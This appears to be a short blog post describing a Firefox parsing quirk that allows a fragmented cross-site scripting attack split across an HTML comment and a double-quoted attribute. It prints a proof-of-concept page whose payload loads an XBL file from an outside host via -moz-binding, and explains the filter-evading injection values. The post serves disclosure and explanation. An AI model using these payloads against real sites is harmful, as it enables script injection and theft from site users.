Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Github Stackoverflow MLA CORE Institutional Repo Hypothes.is ORCID ID  ORCID iD Wikipedia Pictures for Re-Use

Following on from a post on sla.ckers it emerges that Firefox has a vulnerability/bug that is very difficult to filter against and allows a fragmented XSS attack.

This is best illustrated by the following example:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<title>test</title>
	</head>
	<body>
		<!-- This is the first injection point: -- -->
		<a href="This is the second injection point: --evadefilter>
		<b style=-moz-binding:url('http://www.md5-db.com/STXSS_XBL.xml#loader') />
		<a href=test ">link</a>
	</body>
	</html>

The conditions for the XSS working are 2 injection points. Injection point 1 must be inside an HTML comment whilst injection point 2 is inside a double quoted attributed. Here is the above markup replaced to illustrate this:

<!-- This is the first injection point: HERE -->
<a href="This is the second injection point: HERE">

If the first injection point is given as "--" (no quotes) then a nested comment is begun. Injection point 2 should contain --> or --ANYTHING> (which is rendered as a valid comment closing tag in Firefox) to close the comment. At this point the input is being written directly into the document rather than inside the attribute - and all without using the " character which is likely to be filtered.

Thanks to tx and thornmaker at sla.ckers for work on this!